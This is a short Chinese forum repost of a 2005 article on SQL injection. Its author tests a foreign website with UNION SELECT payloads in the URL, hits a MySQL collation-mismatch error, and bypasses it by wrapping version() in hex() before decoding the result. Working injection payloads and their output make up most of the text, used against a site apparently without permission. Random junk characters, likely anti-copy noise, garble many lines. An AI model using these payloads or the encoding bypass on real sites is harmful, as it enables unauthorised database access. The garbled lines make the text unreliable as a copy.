本文作者:SuperHei7 r$ |; R$ }$ b. E
文章性质:原创
0 z% a& e6 J: l. x5 g3 W发布日期:2005-10-18
. a& q6 r9 D( A' T6 N测试个国外的站时: p( S$ r, S) ^0 K- J% m7 |+ ^
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*6 T0 \5 @1 c7 j" Z
返回错误:
+ Y' I& d/ z7 L( DIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
7 R% {) U0 W2 q; `, }" c# R# X8 QMySQL Error No. 126
3 T2 J1 t% n- M" e/ [看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。4 Y! k" F- x) |% D5 Y; |
解决办法:转为其他编码如hex。! Q1 n- g! e/ C/ W2 h) `* \8 J, x
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*# w3 Z8 H5 W ^7 P2 N4 ]) F$ Y0 w
成功得到hex(version())的值为:2 S$ L* S: ?$ E% [( {# l o
342E312E332D62657461* V0 a8 g! M/ ?! r+ k
回Mysql查询下得到:5 W) D8 c: J4 y( a3 j
mysql> select 0x342E312E332D62657461;
* p K1 g; c6 G. z+------------------------+
4 u- R3 C$ z6 [/ q& q| 0x342E312E332D62657461 |7 \. a6 u; p, j" E! A$ M4 l
+------------------------+
4 D6 o7 V$ l8 R| 4.1.3-beta |
2 k* A8 u! Q) P4 Z+------------------------+
( ^" b5 u' Y% R1 row in set (0.00 sec)( D3 w+ n# d# h& Y& R4 O
' j$ r, t$ k- k& `' C4 H+ v$ Y9 h
|
发表于 2012-9-15 14:04:54
收藏
支持
反对